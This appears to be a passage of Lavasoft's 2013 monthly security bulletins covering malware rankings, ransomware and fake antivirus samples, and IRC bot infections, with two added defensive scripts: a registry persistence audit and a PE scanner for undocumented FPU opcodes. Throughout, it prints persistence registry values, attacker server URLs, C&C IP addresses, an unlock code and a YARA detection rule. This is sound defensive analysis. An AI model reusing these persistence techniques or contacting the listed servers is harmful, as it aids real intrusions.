[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE" = "%Documents and Settings%\All Users\%AppData%\rundll32.exe %Documents and Settings%\All Users\%AppData%\1doqet.dat,FG00"

To launch itself, the Trojan copies the "rundll32.exe" system file to the folder:

%Documents and Settings%\All Users\%AppData%\rundll32.exe

The Trojan can be removed in Windows Safe Mode with Command Prompt (paths containing spaces are quoted so the commands run as intended):

del "%Documents and Settings%\All Users\%AppData%\1doqet.dat"
del "%Documents and Settings%\All Users\%AppData%\rundll32.exe"
del "%Documents and Settings%\%Current User%\Start Menu\Programs\Startup\msconfig.lnk"
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v CTFMON.EXE

The attackers’ server, from which the HTML page that locks the computer is loaded, is located in the United States:

Ransomware: Example 2

Ransomware (MD5: eb02341a6de903a1d869b324bc1c3ff3) is detected by Ad-Aware as Trojan.Win32.Generic!BT

As in the previous example, the Trojan can be removed in Windows Safe Mode with Command Prompt. To remove the Trojan executable file:

del "%Documents and Settings%\%Current User%\%AppData%\skype.dat"

… then delete the affected registry autorun value using the command prompt:

reg delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v shell

The HTML page that locks the computer is hosted in the Netherlands:
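The ransomware examples in the April bulletin and the two above all persist through the same three places: a Run value, the Winlogon "Shell" value, or (in the April Example 3) deletion of the SafeBoot branch. The following is an added illustration, not Lavasoft's code or Ad-Aware's detection logic: an audit that parses a .reg-style text export in the same [key] / "name" = "value" layout the bulletin uses, rather than the live registry, so it runs anywhere. It flags Run entries launching from user-writable folders, rundll32 loading a non-.dll payload, a replaced Winlogon Shell, and a missing SafeBoot\Minimal or SafeBoot\Network key. The export below is constructed from the values quoted in the bulletin; the USER_WRITABLE markers and the expected "explorer.exe" Shell are this example's assumptions.

```python
"""Audit exported registry persistence points for the patterns the bulletin's
ransomware examples use. Added illustration, not Lavasoft's code; the export
is constructed and the markers below are assumptions."""
import re

SAMPLE_EXPORT = r"""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon" = "C:\Windows\system32\ctfmon.exe"
"top" = "%Documents and Settings%\%CurrentUser%\%AppData%\top1.exe"
"CTFMON.EXE" = "%Documents and Settings%\All Users\%AppData%\rundll32.exe %Documents and Settings%\All Users\%AppData%\1doqet.dat,FG00"

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "%Documents and Settings%\%CurrentUser%\%AppData%\Battleshield.exe"

[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal]
"""

_KEY = re.compile(r"^\[(.+)\]$")
_VALUE = re.compile(r'^"([^"]*)"\s*=\s*"(.*)"$')


def parse_export(text):
    """Return {key: {name: value}}; keys and value names are lower-cased so
    lookups do not depend on how the export was capitalised."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY.match(line)
        if m:
            current = m.group(1).lower()
            keys.setdefault(current, {})
            continue
        m = _VALUE.match(line)
        if m and current is not None:
            keys[current][m.group(1).lower()] = m.group(2)
    return keys


# Assumed markers for locations a limited user can write to.
USER_WRITABLE = ("%appdata%", "%temp%", "%localappdata%",
                 "\\application data", "\\temp\\", "\\local settings")
RUN_KEYS = ("software\\microsoft\\windows\\currentversion\\run",
            "software\\microsoft\\windows\\currentversion\\runonce")
WINLOGON = "software\\microsoft\\windows nt\\currentversion\\winlogon"
SAFEBOOT_REQUIRED = (r"hklm\system\currentcontrolset\control\safeboot\minimal",
                     r"hklm\system\currentcontrolset\control\safeboot\network")


def in_user_writable(command):
    c = command.lower()
    return any(marker in c for marker in USER_WRITABLE)


def audit(export):
    """Return (key, value_name, reason) tuples for each suspicious finding."""
    findings = []
    for key, values in export.items():
        if key.endswith(RUN_KEYS):
            for name, cmd in values.items():
                if in_user_writable(cmd):
                    findings.append((key, name, "run entry launches from a user-writable folder"))
                if "rundll32" in cmd.lower() and ".dll" not in cmd.lower():
                    findings.append((key, name, "rundll32 loading a non-.dll payload"))
        if key.endswith(WINLOGON):
            shell = values.get("shell")
            if shell is not None and shell.strip().lower() != "explorer.exe":
                findings.append((key, "shell", "Winlogon Shell replaced; expected explorer.exe"))
    for required in SAFEBOOT_REQUIRED:
        if required not in export:
            findings.append((required, "", "SafeBoot key missing; Safe Mode would fail (BSOD)"))
    return findings


if __name__ == "__main__":
    for key, name, reason in audit(parse_export(SAMPLE_EXPORT)):
        print(f"[{key}] {name!r}: {reason}")
```

Run against the constructed export it reports five findings: the "top" and "CTFMON.EXE" Run values (user-writable paths), the rundll32 line loading a .dat, the replaced Shell, and the absent SafeBoot\Network key. On a live system the same checks apply to the output of reg export for those keys.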

In May, our automated malware analysis system also revealed new fake antiviruses which did not make it into the Top 20. Be cautious of this common scam - the threats detected by these programs do not exist on your PC! You can see what a common fake AV infection procedure looks like on Lavasoft’s Facebook page.

Fake AV (MD5: 984539c28d5c916be994c5eda5829be1) is detected by Ad-Aware as FraudTool.Win32.FakeRean

Fake AV (MD5: 7d7274a1cae4fc938ae4921ea74e7254) is detected by Ad-Aware as FraudTool.Win32.FakeRean.e

Fake AV (MD5: e5a17537734661574a839584398b85c8) is detected by Ad-Aware as Trojan.Win32.FakeAV.gbd

Fake AV (MD5: f6d881ab2eac9a7a399586b655cc895e) is detected by Ad-Aware as Trojan.Win32.Generic!BT

All threats described above are successfully detected by Ad-Aware Antivirus. Never pay a fee to attackers!

Update Windows to Avoid Vulnerability Exploits

At the beginning of May, a new exploit was detected on the Department of Labor’s (DoL) official web site. The exploit took advantage of a vulnerability in Internet Explorer 8: a “use-after-free” condition that occurs when a CGenericElement object is freed but a reference to it is kept on the Document and used again during rendering. Successful exploitation could allow an attacker to execute arbitrary code on the affected system.

According to the Net Applications statistics, the 23% of users running Internet Explorer 8 were the group most at risk, while all Windows XP SP3 users may have been exposed to potential risks. We suppose that an attacker could perform the following actions on the affected system:

  • Use the system as a temporary stage to attack further targets.
  • Obtain a higher level of access, i.e., Administrator privileges.
  • Disable UAC.
  • Get detailed information about OS.
  • Get full access to the file system.
  • Add user accounts.
  • Download and launch any file.
  • Steal confidential information from:
    • Browsers;
    • IM clients;
    • Skype, Bitcoin;
    • File managers;
    • FTP, SFTP, SSH, SCP clients;
    • Email clients;
    • Standard Windows storages;
    • Wireless connection system.
  • Listen to the microphone, capture web-camera screenshots, track keystrokes.
  • Get full control of the system using Remote Desktop.
  • Restore deleted files.
  • Explore network environment of the compromised system.
  • Perform injections of the malicious code into the address space of any process.

For detailed information about the threat, visit.

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Adware.Linkury | 22.92% | +4.74%
2 | MyWebSearch | 19.28% | -3.33%
3 | Win32.Toolbar.Iminent | 18.33% | +8.7%
4 | Win32.PUP.Bandoo | 6.32% | +0.76%
5 | SweetIM | 4.41% | -1.14%
6 | Bprotector | 3.20% | -1.26%
7 | Yontoo | 2.46% | +0.19%
8 | Babylon | 1.60% | +0.11%
9 | DomaIQ | 1.55% | +0.4%
10 | Wajam | 1.50% | -0.86%
11 | DownloadMR | 1.35% | 0.00%
12 | InstallBrain | 1.20% | -0.2%
13 | Artua Vladislav | 1.12% | -0.28%
14 | GamePlayLabs | 1.08% | -0.09%
15 | Win32.Adware.ShopAtHome | 0.96% | -0.14%
16 | Bundlore | 0.69% | new
17 | CoolMirage Ltd | 0.69% | -0.66%
18 | Win32.Toolbar.Mediabar | 0.68% | new
19 | BetterInstaller | 0.59% | -0.51%
20 | Optimum Installer | 0.58% | new

Top20 PUPs detected on user’s PC

Operating Systems

Infections by OS

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Lavasoft Security Bulletin: June 2013


Top20 Blocked Malware

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Win32.Trojan.Agent | 33.21% | +1.91%
2 | Trojan.Win32.Generic!BT | 26.89% | +2.85%
3 | Trojan.Win32.Generic.pak!cobra | 3.74% | +1.12%
4 | Virus.Win32.Sality.at | 3.23% | -0.17%
5 | Malware.JS.Generic | 2.75% | +1.00%
6 | Trojan.Win32.Ramnit.c | 1.93% | +1.07%
7 | HackTool.Win32.Keygen | 1.62% | -0.10%
8 | Trojan.JS.Generic | 1.45% | -1.05%
9 | Trojan.Win32.Sirefef.bb | 1.40% | +0.71%
10 | Virus.VBS.Ramnit.a | 1.09% | -0.85%
11 | Email-Worm.Win32.Brontok.a | 1.09% | -0.36%
12 | Virus.Win32.Ramnit.b | 1.03% | -0.45%
13 | Trojan-Clicker.HTML.Iframe | 0.89% | new
14 | Trojan.Win32.Jpgiframe | 0.83% | +0.27%
15 | INF.Autorun | 0.78% | -0.21%
16 | Virus.Win32.Virut.ce | 0.73% | new
17 | Packed.Win32.PWSZbot.gen.cy | 0.70% | new
18 | Virus.Win32.Neshta.a | 0.69% | -0.32%
19 | Virus.Win32.Sality.ah | 0.69% | -0.33%
20 | Heur.HTML.MalIFrame | 0.57% | +0.15%

The Top 20 malicious programs blocked on PCs

June sees Malware.JS.Generic, the most prevalent generic detection for Trojans written in JavaScript. The majority of these threats come from the Internet; Ad-Aware detects them and keeps users' PCs safe.

Three new families entered the Top 20. Trojan-Clicker.HTML.Iframe, in thirteenth position, is designed to inflate site visitor statistics and was discussed previously in a Lavasoft whitepaper published in June 2012.

Virus.Win32.Virut.ce, in sixteenth position, was discussed previously in a Lavasoft whitepaper published in April 2012, and a new generic detection for the multifunctional Trojans Zbot Packed.Win32.PWSZbot.gen.cy is in seventeenth position. Information about some modifications can be found here and here.

New Incomings to the Lab

Let’s review and consider information on the number of unique files with the same detection name.

Position | Ad-Aware detection | % of all threats | Change in ranking
--- | --- | --- | ---
1 | Trojan.Win32.Generic!BT | 35.74% | -0.29%
2 | Virus.Win32.Expiro.bc | 3.90% | +1.35%
3 | Trojan.Win32.Medfos.m | 3.28% | +1.62%
4 | Virus.Win32.Virut.ce | 2.41% | +0.87%
5 | Trojan.Win32.Generic.pak!cobra | 2.31% | -0.75%
6 | Trojan.Win32.Generic!SB.0 | 1.60% | +0.07%
7 | Trojan.Win32.PSW.gz | 1.22% | new
8 | Worm.Win32.Mabezat.b | 0.96% | +0.37%
9 | Trojan.JS.Obfuscator.aa | 0.70% | +0.11%
10 | Trojan-PWS.Win32.Zbot.aql | 0.55% | +0.15%
11 | Malware.JS.Generic | 0.35% | -0.24%
12 | Exploit.HTML.Iframe.dm | 0.22% | -0.37%
13 | Trojan.Win32.Dwnldr.y | 0.36% | -1.93%
14 | TrojanPWS.Win32.OnLineGames.ahj | 0.35% | -0.12%
15 | Trojan.Win32.Vobfus.paa | 0.35% | +0.06%
16 | Worm.Win32.Gamarue.aa | 0.35% | new
17 | Trojan.Win32.Qhosts.bf | 0.35% | -0.18%
18 | Virus.Win32.PatchLoad.d | 0.24% | 0.00%
19 | FraudTool.Win32.FakeRean | 0.34% | new
20 | Win32.Malware!Drop | 0.33% | +0.15%

New malicious programs entered the Top 20

June sees Trojan.Win32.PSW.gz entering the Top 20 and occupying the eighth position. The Trojan is designed to steal confidential data from World of Warcraft user accounts. It was first mentioned in a whitepaper published in May 2012. Trojans were particularly active in stealing online game accounts during that time, and this trend is likely to continue this summer.

FraudTool.Win32.FakeRean is in the nineteenth position, discussed previously in a Lavasoft whitepaper published in April 2012.

Worm.Win32.Gamarue.aa occupies the sixteenth position. The worm’s modifications can spread as email attachments and via removable drives; they can send information about the compromised system to the command server, download from the Internet and then launch other malicious programs. Depending on the attacker’s commands, the worm can steal confidential data.

The flood of ransomware that locks the computer shows no signs of dissipating. Our automated malware analysis system found an interesting sample, detected as Trojan.Win32.Generic!BT, among the generic detections. Only a minority of antivirus vendors detected it.

Detecting a malicious program MD5: b55cd45af00206933005d9eb1d5cfc4c on the online service virustotal.com

The sample was compiled on May 14, 2013. According to the detection ratio, only 17 antivirus programs detect it. The sample is still current.

File details MD5: b55cd45af00206933005d9eb1d5cfc4c virustotal.com

The original file name under which the Trojan spreads is "visfx.exe":

Original Trojan name MD5: b55cd45af00206933005d9eb1d5cfc4c

The Trojan is written in .Net. The main program window that blocks the computer is presented below:

Ransomware (MD5: b55cd45af00206933005d9eb1d5cfc4c) is detected by Ad-Aware as Trojan.Win32.Generic!BT

Clicking the "Link1" or "Link2" button opens the following URL in the browser, but the blocking window does not close:

http://unlck.com/1md

You are then directed to proceed with the steps below to unlock your computer:

Content of the Internet resource http://unlck.com/1md

You may be asked to participate in online gambling, be presented with competitions to win an iPhone 5 by sending a paid text message to a short number, submit an online application form containing your confidential data, download a free application which is in fact a malicious program, and other fraud schemes. Obviously, affected users should not participate.

A particularity of the Trojan is that all components of the blocking window are downloaded from the legitimate file sharing service Dropbox:

hxxps://dl.dropbox.com/s/zb9jt8hr5vfr525/1024X576.png
hxxps://dl.dropbox.com/s/id3z6oobm2a7gou/1366X768.png
hxxps://dl.dropbox.com/s/wh4pc80c5jl9iw4/1600X900.png
hxxps://dl.dropbox.com/s/xu929toh5cyid30/screen.png
hxxps://dl.dropbox.com/s/0ej33arbrxrndq1/lock-screen.png
hxxps://dl.dropbox.com/s/c8luiic5kqckr5x/link1.png
hxxps://dl.dropbox.com/s/1bfzv4c0njg58j1/link2.png
hxxps://dl.dropbox.com/s/plpofi8486lkung/verify.png

Once downloaded, they are saved to the current user's %Application Data% folder.

Attackers use no packers or crypters and download the components from Dropbox, disguising the malware as legitimate software. This leaves few anomalies in the executable files or the network activity for antivirus vendors to detect.

To hinder removal, the Trojan terminates the following processes: taskmgr.exe, regedit.exe, cmd.exe, msconfig, amongst others:

List of processes the Trojan ends MD5: b55cd45af00206933005d9eb1d5cfc4c

The Trojan can be easily removed in Windows Safe Mode. Deleting the following key with the registry editor is required:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Audio Drivers" = "<original file name>.exe"

To remove the Trojan completely, note the path to the Trojan's original file from the "Audio Drivers" value before removing the autorun key.

In an effort to make removal more difficult, attackers built in a removal sequence that requires an activation code. It can be found in a resource of the Trojan executable file:

Audio_Drivers.Resources

When the "unlockmypcplease01" code is entered, the Trojan is removed from your PC showing the following message:

Successful unlock message

Each successful unlock process is reported to the attacker’s server:

http://forcesurvey.3jelly.com

The server is located in the United States:

Attacker’s server location

Below are statistics we managed to retrieve from the attacker’s server:

Threat statistics from the server http://forcesurvey.3jelly.com

A majority of people tried to pass three steps to unlock their computers. Be careful to avoid these mistakes.

In June, our automated malware analysis system also revealed new fake antiviruses which did not enter the Top 20. Be careful! All "threats" detected by these programs are fake – they are designed to trick you into believing your machine is infected.

Fake AV (MD5: 83146ad25c67506c1e0ce3abd3bf0564) is detected by Ad-Aware as FraudTool.Win32.FakeRean.i

Fake AV (MD5: ca1ecf7e2a26fd8e9ca1b9326c9d1b57) is detected by Ad-Aware as LooksLike.Win32.Malware!D

Fake AV (MD5: 15bc8488c79059cda1ef9197dbea50b0) is detected by Ad-Aware as Trojan.Win32.Kryptik.argh

All threats described above are successfully detected by Ad-Aware. Ransomware and fake antivirus target unsuspecting computer users making them pay a fee to unlock their computers.

Chinese NetTraveler

On June 4, Kaspersky Lab published a report on the NetTraveler cyber-espionage campaign, which covers more than 350 victims in 40 countries. The compromised organizations include Tibetan/Uyghur activists, oil industry companies, scientific research centers and institutes, universities, private companies, governments and governmental institutions, embassies and military contractors. The most affected countries are Mongolia, Russia, India and Kazakhstan. Based on the analysis of C&C scripts and NetTraveler's communication protocol, researchers concluded that the spy tool originated in China. Common targets with the "Red October" campaign were also found in Russia, Iran, Belgium, Kazakhstan, Belarus and Tajikistan.

The attacks start with spear-phishing e-mails carrying MS Office attachments that exploit the CVE-2012-0158 and CVE-2010-3333 vulnerabilities. Once the document is opened, the spy tool is installed; it collects private information, compresses it and sends it to the attacker. By default it looks for DOC, XLS, PPT, RTF and PDF documents on the victim's computer, but the list can be extended in a configuration file.

To protect your computer, it is recommended to install an antivirus with the latest definitions as well as to download and apply security updates for already installed software.

The malicious components are detected by Ad-Aware as Trojan.Win32.Generic!BT

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Position | Ad-Aware detection | % of all threats | Change in ranking
--- | --- | --- | ---
1 | MyWebSearch | 20.12% | +0.84%
2 | Adware.Linkury | 19.79% | -3.13%
3 | Win32.Toolbar.Iminent | 10.58% | -7.75%
4 | Win32.PUP.Bandoo | 6.55% | +0.23%
5 | SweetIM | 6.43% | +2.02%
6 | Bprotector | 4.11% | +0.91%
7 | Yontoo | 3.15% | +0.69%
8 | InstallCore | 2.28% | new
9 | DomaIQ | 2.18% | +0.63%
10 | Babylon | 1.83% | +0.23%
11 | Artua Vladislav | 1.54% | +0.42%
12 | InstallBrain | 1.35% | +0.15%
13 | Wajam | 1.28% | -0.22%
14 | DownloadMR | 1.15% | -0.20%
15 | GamePlayLabs | 1.13% | +0.05%
16 | CoolMirage Ltd | 1.06% | +0.37%
17 | Win32.Adware.ShopAtHome | 0.89% | -0.07%
18 | Vittalia Installer | 0.87% | new
19 | Optimum Installer | 0.81% | +0.23%
20 | Win32.Toolbar.Mediabar | 0.81% | +0.13%

Top20 PUPs detected on user’s PC

Operating Systems

Infections by OS

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Tandem-type IRC Bots

Our automated malware analysis system, Lavasoft MAS, recently revealed an interesting incident: a system infected by three IRC bots at once, Nrgbot, Blazebot and Rbot. Analysis of Rbot showed that at least two C&C servers existed from which all three bots can receive commands.

Each bot can periodically download updated modifications by commands issued via IRC. This causes difficulties in attempts to disinfect the compromised system. Detection rates for the latest modification of Rbot are shown below.

We revealed an interesting collection of IRC bots created by attackers.

The fact that the Nrgbot builder and source code as well as Rbot source code have become public and are returned as first results in google searches, gives attackers a wide range of possibilities on the affected system.

Lavasoft Security Bulletin: July 2013

Top20 Blocked Malware

Position | Ad-Aware detection | % of all threats | Change in ranking
--- | --- | --- | ---
1 | Win32.Trojan.Agent | 29.91% | -3.30%
2 | Trojan.Win32.Generic!BT | 24.50% | -2.39%
3 | Backdoor.Win32.VB.lvn | 10.20% | new
4 | INF.Autorun | 2.96% | +2.18%
5 | Virus.Win32.Sality.at | 2.65% | -0.58%
6 | Win32.Backdoor.Inject/C | 2.50% | new
7 | Worm.Win32.Taterf.b | 2.12% | new
8 | Trojan.Win32.Generic.pak!cobra | 2.11% | -1.63%
9 | Malware.JS.Generic | 1.99% | -0.76%
10 | Trojan-Dropper.Win32.Agent | 1.81% | new
11 | Virus.Win32.Sality.ek | 1.63% | new
12 | Virus.Win32.Neshta.a | 1.20% | +0.51%
13 | HackTool.Win32.Keygen | 1.10% | -0.52%
14 | Virus.Win32.Ramnit.b | 1.06% | +0.03%
15 | Virus.Win32.Virut.ce | 0.90% | +0.17%
16 | Virus.VBS.Ramnit.a | 0.90% | -0.19%
17 | Virus.Win32.Sality.ah | 0.87% | +0.18%
18 | Trojan.Win32.Generic!SB.0 | 0.43% | new
19 | Trojan.Win32.Jpgiframe | 0.34% | -0.49%
20 | Heur.HTML.MalIFrame | 0.32% | -0.25%

The Top 20 malicious programs blocked on PCs

July sees a new entry at position three in the Top 20, Backdoor.Win32.VB.lvn, a detection for a backdoor written in Visual Basic. The malware provides an attacker with access to the compromised system.

A detection for autorun.inf, INF.Autorun, takes the fourth position. The file is used by worms to spread. In July, Ad-Aware detected and disinfected an increased number of these infections.

New appearances include Trojan.Win32.Generic!SB.0 and a modification of Sality, Virus.Win32.Sality.ek, previously examined in the first Lavasoft whitepaper published in March 2012.

Win32.Backdoor.Inject, discussed previously in a Lavasoft whitepaper published in January 2013, is a generic detection for malicious programs which inject malicious code into running processes. The injected code is used by attackers to gain access to the compromised system.

Worm.Win32.Taterf.b is a worm spread through all logical, network and removable drives and is capable of disabling antivirus services. Its main payload is stealing online game users’ data, for games such as Age of Conan, Online Pool, Chain of Command and Knight Online.

During the summer, online game users are frequently the target for malware authors. This can be explained by the fact that vacation time sees an increase in online gaming activity.

Trojan-Dropper.Win32.Agent is a detection for Trojan programs which install other malicious programs as well as potentially unwanted software on the system.

New Incomings to the Lab

Let’s review and consider information on the number of unique files with the same detection name.

Position | Ad-Aware detection | % of all threats | Change in ranking
--- | --- | --- | ---
1 | Trojan.Win32.Generic!BT | 36.22% | +0.48%
2 | Trojan.Win32.Generic.pak!cobra | 4.58% | +2.27%
3 | Virus.Win32.Expiro.bc | 3.18% | -0.72%
4 | Trojan-Downloader.Win32.LoadMoney.s | 2.71% | new
5 | Trojan.Win32.Generic!SB.0 | 1.06% | -0.54%
6 | Trojan.Win32.PSW.gz | 0.98% | -0.24%
7 | Trojan-Dropper.Win32.Gepys.a | 0.81% | new
8 | Virus.Win32.Virut.ce | 0.77% | -1.64%
9 | Trojan.JS.Obfuscator.aa | 0.59% | -0.11%
10 | Win32.Malware!Drop | 0.48% | +0.15%
11 | Trojan.Win32.Vobfus.paa | 0.42% | +0.07%
12 | Worm.Win32.Pykspa | 0.40% | new
13 | FraudTool.Win32.FakeRean | 0.39% | +0.05%
14 | Worm.Win32.Gamarue.aa | 0.38% | +0.03%
15 | Trojan.Win32.Autorun.dm | 0.32% | new
16 | Trojan.Win32.Qhosts.bf | 0.31% | -0.04%
17 | Malware.JS.Generic | 0.31% | -0.04%
18 | TrojanPWS.Win32.OnLineGames.ahj | 0.30% | -0.05%
19 | Trojan.Win32.Dwnldr.y | 0.28% | -0.08%
20 | Worm.Win32.Mabezat.b | 0.27% | -0.69%

New malicious programs entered the Top 20

July sees four new detections in the Top 20. Worm.Win32.Pykspa, discussed previously in a Lavasoft whitepaper published in April 2013; Trojan.Win32.Autorun.dm, which entered the Top 20 for the first time in August 2012 is designed to automatically run malicious programs; Trojan-Downloader.Win32.LoadMoney and Trojan-Dropper.Win32.Gepys.a.

Trojan-Downloader.Win32.LoadMoney.s is a Trojan program which installs other malicious programs on the compromised system without user’s knowledge. Mail.ru previously used a downloader that installed the Mail.ru.Guard and Mail.ru.Sputnik utilities without user’s knowledge. Some antivirus vendors detected this malicious program as "not-a-virus LoadMoney". We categorise such programs as “Trojan” because it is unacceptable for legal software to install a program without user’s knowledge.

Trojan-Dropper.Win32.Gepys.a is a Trojan that installs other malicious programs on the system. As a rule, it is a dynamic link library (DLL) saved in the "All Users" profile to the %AppData%\Mozilla folder under a randomly generated name. The automatic launch of a DLL at each running process is caused by changes to the "AppInit_DLLs" system registry key:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows]

Fake antiviruses holding machines to ransom until a fee is paid to unlock their computers continue to blight users. In July, our systems detected the following fake antiviruses:

Fake AV (MD5: 5a88b972fcf39d2f5b0fb941b76f54c6) is detected by Ad-Aware as Trojan.Win32.FakeAV.IS

Fake AV (MD5: 7b8763eb682cef61090c7eeb3f6e408d) is detected by Ad-Aware as Trojan.Win32.Jorik.Fraud.un

Fake AV (MD5: 51f39bed9b38cd74ce3020e9e7b9730f) is detected by Ad-Aware as Trojan.Win32.FakeAv.awrp

Undocumented FPU instructions

In June, Microsoft published the results of its investigation into a new undocumented instruction trick, and AlienVault Labs subsequently published "Hunting for malware with undocumented instructions". The following malware samples were found to use FPU instructions that lead to incorrect disassembly in several debuggers and disassemblers: Backdoor:Win32/Farfli.AV, Trojan:Win32/Danglo and Backdoor:Win32/Zegost.B.

Based on a Yara rule from AlienVault Labs, in July, we added the following Yara rule to Lavasoft MAS:

rule undocumentedFPUinstructions
{
    strings:
        $a1 = {D9 D8}
        $a2 = {DF DF}
    condition:
        ($a1  in (entrypoint..entrypoint+12)) or ($a2  in (entrypoint..entrypoint+12)) or (for any of ($a*) : ($ at entrypoint))
}
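As an added example (not code from the bulletin or from Lavasoft MAS), the following Python script applies the same check as the YARA rule above to a PE file without a YARA engine: it walks the DOS, PE and section headers to the file offset of the entry point and reports either byte pair (D9 D8, DF DF) whose first byte lies within the first 12 bytes after it, which is what the rule's `entrypoint..entrypoint+12` range means. `build_sample_pe` is a constructed helper that emits a minimal, non-runnable PE32 image for testing; none of its contents correspond to any sample on this page.

```python
import struct
import sys

# The two byte sequences from the YARA rule above; the rule matches when
# either of them starts anywhere in the first 12 bytes after the entry point.
UNDOCUMENTED_FPU = (b"\xd9\xd8", b"\xdf\xdf")
EP_WINDOW = 12


def entry_point_file_offset(pe: bytes) -> int:
    """Map AddressOfEntryPoint (an RVA) to a file offset via the section table.
    Minimal PE32/PE32+ header walk, no third-party parser needed."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    (n_sections,) = struct.unpack_from("<H", pe, coff + 2)       # NumberOfSections
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)        # SizeOfOptionalHeader
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", pe, opt)
    if magic not in (0x10B, 0x20B):                              # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    (ep_rva,) = struct.unpack_from("<I", pe, opt + 16)           # AddressOfEntryPoint
    sections = opt + opt_size
    for i in range(n_sections):
        hdr = sections + i * 40
        vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, hdr + 8)
        if vaddr <= ep_rva < vaddr + max(vsize, raw_size):
            return raw_ptr + (ep_rva - vaddr)
    raise ValueError("entry point RVA 0x%x lies outside every section" % ep_rva)


def find_undocumented_fpu(pe: bytes, window: int = EP_WINDOW):
    """Return [(pattern_hex, offset_from_entry_point), ...] for matches whose
    first byte lies in entrypoint..entrypoint+window, like the YARA rule."""
    ep = entry_point_file_offset(pe)
    region = pe[ep:ep + window + 2]        # a 2-byte pattern may start at ep+window
    hits = []
    for pattern in UNDOCUMENTED_FPU:
        pos = region.find(pattern)
        while pos != -1:
            hits.append((pattern.hex(), pos))
            pos = region.find(pattern, pos + 1)
    return sorted(hits, key=lambda h: h[1])


def build_sample_pe(code: bytes, ep_offset: int = 0) -> bytes:
    """Constructed test input: a minimal, non-runnable PE32 with one .text
    section holding `code`; the entry point is `ep_offset` bytes into it."""
    vaddr, raw_ptr = 0x1000, 0x200
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)   # i386, 1 section
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<I", opt, 16, vaddr + ep_offset)               # AddressOfEntryPoint
    text = struct.pack("<8sIIIIIIHHI", b".text", len(code), vaddr,
                       len(code), raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text
    return headers.ljust(raw_ptr, b"\0") + code


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            hits = find_undocumented_fpu(fh.read())
        print(path, "->", hits or "no undocumented FPU opcodes near the entry point")
```

Run it as `python fpu_check.py sample.exe`. As the bulletin notes below for the patched notepad.exe, a hit is a triage signal, not a verdict: a clean file whose entry point was edited in this way will match too, so the result belongs next to other indicators rather than standing alone.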

Our automated analysis systems detected the following samples:

MD5: 0f66f960852d1c9fb184e4813143aa90, detected by Ad-Aware as Trojan.Win32.Bdoor.bdk, detected by Microsoft as Backdoor:Win32/Zegost.AD

MD5: 5eb3a32051320dc1b3caa6e554a54ffb, detected by Ad-Aware as Trojan.Win32.Generic!BT, detected by Microsoft as Backdoor:Win32/Racdr.A

MD5: 011d1e05bb63314922936d02b63a7a93, detected by Ad-Aware as Trojan.Win32.Generic!BT, detected by Microsoft as DDoS:Win32/Nitol.A

MD5: cf9ee9be74908e1c8c3b2ee607812743, detected by Ad-Aware as Trojan.Win32.Generic!BT, detected by Microsoft as Backdoor:Win32/Babmote.A

MD5: e2bdc9e611a6cbe3f637165dcd14990c, detected by Ad-Aware as Trojan.Win32.Redosdru.C, detected by Microsoft as Backdoor:Win32/Babmote.A

All files apart from DDoS:Win32/Nitol.A were unpacked; DDoS:Win32/Nitol.A was packed with RLPack. Attackers might use special tooling to add those instructions to executable files after compiling and packing. We tried to reproduce the attackers' actions by experimenting with a legitimate file, notepad.exe, and modifying its entry point:

MD5: 394f5fd5696cca3648a53a179da66059

Afterwards, the file was uploaded to virustotal.com:

Two antivirus vendors added detection of the undocumented instructions and now flag even clean files that carry them. Attackers can use the trick to defeat the emulators of antivirus companies.

Tandem-type IRC Bots

In July, an interesting infection incident was detected by our automated malware analysis system, Lavasoft MAS. Three IRC bots were detected simultaneously on the compromised system: Nrgbot, Blazebot and Rbot.

Two C&C servers were detected from which commands can be received by Nrgbot (channel #nrz#), Rbot (channel #fkyou#) and Blazebot (channel ##TBT). All bots auto-join the "#Security-Check" channel. The servers:

178.33.232.15
146.82.5.222

By connecting to the C&C servers with the Internet Relay Chat client mIRC, it is possible to track the current commands the bots receive. At the time of writing, the same commands were being received from both servers:

Attackers again show an interest in Bitcoin. With malicious programs such as Skyper, attackers can install a Bitcoin generator on compromised computers. This time, attackers went further and organized a tandem of IRC bots.

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Position | Ad-Aware detection | % of all threats | Change in ranking
